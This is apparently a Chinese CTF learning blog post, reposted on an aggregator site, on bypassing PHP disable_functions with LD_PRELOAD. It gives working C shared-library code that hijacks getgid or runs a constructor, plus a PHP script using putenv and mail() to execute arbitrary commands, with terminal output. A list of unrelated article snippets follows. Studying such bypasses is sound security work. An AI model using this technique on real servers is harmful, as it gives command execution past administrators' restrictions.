LD_PRELOAD 繞過 disable_function 學習

借助這位師傅的文章來學習通過LD_PRELOAD來繞過disable_function的原理

【PHP繞過】LD_PRELOAD bypass disable_functions_phpid繞過-CSDN博客

感謝這位師傅的貢獻

介紹

靜態鏈接:

(1)舉個情景來幫助理解: 假設你要搬家,但家具不換,全部打包帶走。

(2)優點:搬到新家后,直接開箱即用,不依賴外部資源(不去鄰居家借洗衣機)

(3)缺點:搬家時行李又多又重(程序體積大),而且如果家具升級(比如庫更新),得重新買一套再搬一次(重新編譯程序)

(4)在編譯時,所有依賴的庫代碼可直接嵌入到可執行文件中,程序獨立運行,但體積較大,且庫更新需重新編譯程序

動態鏈接:

(1)舉個情景來幫助理解:這次搬家,只帶必需品,其他東西(比如工具書,電器)選擇去附近的圖書館或共享商店按需借用。需要時隨時去拿,用完歸還。

(2)優點:行李輕便(程序體積小),多個家庭共享同一本書或工具(多個程序共享一個庫),資源更新也方便(圖書館換新書)

(3)缺點:可能出現圖書館關門(庫文件缺失)
(4)編譯時不進行函數庫的鏈接,而是在程序運行時才動態地載入所需的函數庫。這樣使得可執行文件體積較小,并且多個程序可以共享相同的動態庫,節省內存資源。動態鏈接提高了程序的靈活性和可維護性。

再來了解一下什么是LD_PRELOAD

LD_PRELOAD 是linux/Unix系統中一個強大的環境變量,允許用戶在程序運行時優先加載自定義的共享庫,從而覆蓋或替換標準庫中的函數。

?也就是說,通過LD_PRELOAD指定的共享庫會在程序啟動時最先加載,其定義的函數會覆蓋后續加載的同名函數。

用法

那么其利用方法很明顯了,如果我們能在我們的自定義庫中寫入一些與”原本函數“ 作用不同 但同名 的函數,就能成功覆蓋掉原本函數的用法了。

跟著師傅的例子再來了解一下

劫持getgid

看看id命令在執行過程中會用到的函數表

┌──(root?kali)-[~/Desktop]
└─# readelf -Ws /usr/bin/id     Symbol table '.dynsym' contains 74 entries:Num:    Value          Size Type    Bind   Vis      Ndx Name0: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND 1: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND endgrent@GLIBC_2.2.5 (2)2: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND getenv@GLIBC_2.2.5 (2)

?而這些函數都是可以被我們覆蓋的,現在觀察一下getgid函數的內容,輸入 man getgid

?構造一個與之原型相同的函數

#include<stdlib.h>
#include<unistd.h>
#include<sys.types.h>gid_t getgid(void){unsetenv("LD_PRELOAD");// 使用unsetenv刪除原有的共享庫system("'echo 'I hacked U!!\n' > successful");
}

運行指令

gcc --shared -fPIC rob.c -o rob.so

?

?接下來,載入這個庫并運行id命令

┌──(root?kali)-[~/test]
└─# LD_PRELOAD=./rob.so id
uid=0(root) gid=0(root) groups=0(root)

?得到successful文件

這就是一次劫持操作

繞過disable_function

當題目中有disable_function的限制時,會導致我們拿到的shell都是空的,這時就要想辦法繞過disable_function。其實我們要實現的操作主要是執行命令,可以使用LD_PRELOAD環境變量強制該程序優先加載一個惡意共享庫(.so文件),覆蓋其調用的標準庫函數(如getuid()),從而執行任意代碼

編寫惡意文件

#include<stdlib.h>
#include<unistd.h>
#include<sys/types.h>__attribute__((constructor)) void hack(void){
// 使用__attribute__((constructor)) 可以在加載庫的同時執行函數unsetenv("LD_PRELOAD");system("ls > hackfile");// 用于php
}

?運行指令

┌──(root?kali)-[~/test]
└─# gcc --shared -fPIC hack.c -o hack.so

編寫hack.php文件

<?php
putenv("LD_PRELOAD=./hack.so");
mail("","","","");
echo file_get_contents("hackfile");
?>

此時再執行,就可以成功劫持了

┌──(root?kali)-[~/test]
└─# php hack.php
sh: 1: /usr/sbin/sendmail: not found
1
hack.c
hack.php
hack.so
hackfile
rob.c
rob.so
successful

?同時,這位師傅還給出了手動輸入參數的做法,真的很厲害

將hack.c改為:

#include<stdlib.h>
#include<unistd.h>
#include<sys/types.h>__attribute__((constructor)) void hack(void){
// 使用__attribute__((constructor)) 可以在加載庫的同時執行函數unsetenv("LD_PRELOAD");char *cmd=getenv("MY_CMD");system(cmd);
}

再將hack.php改為:

<?php
$a=$argv[1];
$cmd="$a > hackfile";
@putenv("MY_CMD=".$cmd);
putenv("LD_PRELOAD=./hack.so");
mail("","","","");
echo file_get_contents("hackfile");
?>

?就可以這樣運行代碼了:

┌──(root?kali)-[~/test]
└─# php hack.php id
sh: 1: /usr/sbin/sendmail: not found
uid=0(root) gid=0(root) groups=0(root)

前幾天看了一篇推文,發覺對漏洞和工具的原理還是要去理解。感謝師傅提供的思路和方法!

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/bicheng/71819.shtml
繁體地址,請注明出處:http://hk.pswp.cn/bicheng/71819.shtml
英文地址,請注明出處:http://en.pswp.cn/bicheng/71819.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

【無人集群系列---無人機集群編隊算法】

【無人集群系列---無人機集群編隊算法】 一、核心目標二、主流編隊控制方法1. 領航-跟隨法&#xff08;Leader-Follower&#xff09;2. 虛擬結構法&#xff08;Virtual Structure&#xff09;3. 行為法&#xff08;Behavior-Based&#xff09;4. 人工勢場法&#xff08;Artific…

Oracle Fusion Middleware更改weblogic密碼

前言 當用戶忘記weblogic密碼時&#xff0c;且無法登錄到web界面中&#xff0c;需要使用服務器命令更改密碼 更改方式 1、備份 首先進入 weblogic 安裝目錄&#xff0c;備份三個文件&#xff1a;boot.properties&#xff0c;DefaultAuthenticatorInit.ldift&#xff0c;Def…

MongoDB 復制(副本集)

MongoDB 復制(副本集) 引言 MongoDB是一個高性能、可擴展、易于使用的文檔存儲系統。它以JSON-like的文檔存儲結構&#xff0c;支持靈活的數據模型。在分布式系統中&#xff0c;為了提高數據可用性和系統穩定性&#xff0c;常常需要實現數據的備份和冗余。MongoDB提供了副本集…

【Erdas實驗教程】009:非監督分類及分類后評價

文章目錄 一、分類過程二、分類評價ERDAS 的 ISODATA 算法是基于最小光譜距離來進行的非監督分類,聚類過程始于任意聚類平均值或一個已有分類模板的平均值;聚類每重復一次,聚類的平均值就更新一次,新聚類的均值再用于下次聚類循環。這個過程不斷重復,直到最大的循環次數已…

一周學會Flask3 Python Web開發-Jinja2模板訪問對象

鋒哥原創的Flask3 Python Web開發 Flask3視頻教程&#xff1a; 2025版 Flask3 Python web開發 視頻教程(無廢話版) 玩命更新中~_嗶哩嗶哩_bilibili 如果渲染模板傳的是對象&#xff0c;如果如何來訪問呢&#xff1f; 我們看下下面示例&#xff1a; 定義一個Student類 cla…

git 命令 設置別名

在Git中&#xff0c;您可以通過以下命令查看所有的alias&#xff08;別名&#xff09;&#xff1a; git config --get-regexp alias 這個命令會列出所有配置的alias&#xff0c;例如&#xff1a; alias.st.status alias.co.checkout alias.br.branch ... 如果您想查看某個特定a…

React Router v5 vs v6 路由配置對比

React Router v5 vs v6 路由配置對比 React Router 是 React 中最常用的路由庫&#xff0c;從 v5 到 v6 版本&#xff0c;發生了較大變化。本文對比 React Router v5 和 React Router v6 的配置方式&#xff0c;幫助開發者順利遷移。 1. 安裝依賴 React Router v5 npm inst…

機器學習,我們主要學習什么?

機器學習的發展歷程 機器學習的發展歷程&#xff0c;大致分為以下幾個階段&#xff1a; 1. 起源與早期探索&#xff08;20世紀40年代-60年代&#xff09; 1949年&#xff1a;Hebb提出了基于神經心理學的學習機制&#xff0c;開啟了機器學習的先河1950年代&#xff1a;機器學習的…

全面理解-深拷貝與淺拷貝

在 C 中&#xff0c;深拷貝&#xff08;Deep Copy&#xff09; 和 淺拷貝&#xff08;Shallow Copy&#xff09; 是兩種完全不同的對象拷貝策略&#xff0c;主要區別在于對指針和動態分配資源的處理方式。正確理解二者的區別是避免內存泄漏、懸空指針和程序崩潰的關鍵。 一、核…

藍橋杯第十六屆嵌入式模擬編程題解析

由硬件框圖可以知道我們要配置LED 和按鍵 LED 先配置LED的八個引腳為GPIO_OutPut&#xff0c;鎖存器PD2也是&#xff0c;然后都設置為起始高電平&#xff0c;生成代碼時還要去解決引腳沖突問題 按鍵 按鍵配置&#xff0c;由原理圖按鍵所對引腳要GPIO_Input 生成代碼&#xf…

在 JavaScript 中,[](空數組)不是假值,它是“真值”(truthy)

文章目錄 語法解釋!this.form.productPhotos 的含義在代碼中的作用具體判斷 實際上下文總結當前代碼的局限 在你的父組件代碼中&#xff0c;出現了 !this.form.productPhotos 這樣的表達式&#xff0c;具體是在 handleSubmit 方法中&#xff1a; private handleSubmit() {if (…

【Springboot3】Springboot3 搭建RocketMQ 最簡單案例

說來也奇怪&#xff0c;RocketMQ 不能很好的兼容Springboot3&#xff0c;剛開始上手Springboot3集成RocketMQ會發現總是不能實例化RocketMQTemplate&#xff0c;老是啟動時報錯。本項目采用Springboot3&#xff0c;JDK21 &#xff0c;Maven 3.9&#xff0c;提供一個非常簡單的示…

抓包工具 wireshark

1.什么是抓包工具 抓包工具是什么&#xff1f;-CSDN博客 2.wireshark的安裝 【抓包工具】win 10 / win 11&#xff1a;WireShark 下載、安裝、使用_windows抓包工具-CSDN博客 3.wireshark的基礎操作 Wireshark零基礎使用教程&#xff08;超詳細&#xff09; - 元宇宙-Meta…

w~視覺~合集13

我自己的原文哦~ https://blog.51cto.com/whaosoft/13384038 #xxx w視覺合集13~17沒了.... #ViTAR 作者提出了一種新穎的架構&#xff1a;任意分辨率的視覺 Transformer &#xff08;ViTAR&#xff09;。ViTAR中的自適應標記合并功能使模型能夠自適應地處理可變分辨率圖像…

漏洞文字版表述一句話版本(漏洞危害以及修復建議),通常用于漏洞通報中簡潔干練【持續更新中】

漏洞文字版表述一句話版本(漏洞危害以及修復建議) SQL注入漏洞 危害描述&#xff1a; SQL注入漏洞允許攻擊者通過構造惡意的SQL語句&#xff0c;繞過應用程序的安全檢查&#xff0c;直接訪問或操作數據庫。這可能導致數據泄露、數據篡改、甚至數據庫被刪除等嚴重后果&#xf…

scp工具

scp 簡介選項將遠程電腦上的文件復制到本地將本地文件復制到遠程電腦 簡介 ??scp???是 secure copy 的縮寫&#xff0c;是基于??ssh??的文件傳輸 命令/工具。 scp 是加密的&#xff0c;rcp 是不加密的&#xff0c;scp 是 rcp 的加強版。 Windows系統中&#xff0c;sc…

微服務即時通信系統---(三)框架學習

目錄 brpc RPC框架 核心概念 工作原理 介紹 安裝 頭文件包含和編譯時指明庫 類與接口介紹 日志輸出類與接口 protobuf類與接口 Closure類 RpcController類 服務端類與接口 ServerOptions類 Server類 ClosureGuard類 HttpHeader類 Controller類 客戶端類與…

初識.git文件泄露

.git 文件泄露 當在一個空目錄執行 git init 時&#xff0c;Git 會創建一個 .git 目錄。 這個目錄包含所有的 Git 存儲和操作的對象。 如果想備份或復制一個版本庫&#xff0c;只需把這個目錄拷貝至另一處就可以了 這是一種常見的安全漏洞&#xff0c;指的是網站的 .git 目錄…

百度百舸 DeepSeek 一體機發布,支持昆侖芯 P800 單機 8 卡滿血版開箱即用

在私有云環境中成功部署 DeepSeek 滿血版并實現性能調優&#xff0c;并不是一件容易的事情。選擇合適的 GPU 配置、安裝相應的環境、成功部署上線業務、加速推理任務加速、支撐多用戶并發 …… 完成業務測試&#xff0c;成功融入生產業務中。 為了幫助企業快速實現 DeepSeek 服…

Mysql 主從集群同步延遲問題怎么解決

主從復制工作原理類比 假設主庫是快遞總倉&#xff0c;從庫是各個分店的倉庫&#xff1a; 總倉每次發貨/退貨都會記錄快遞單&#xff08;binlog&#xff09; 分店派快遞員&#xff08;I/O線程&#xff09;去總倉取快遞單 總倉安排一個打包員&#xff08;binlog dump線程&…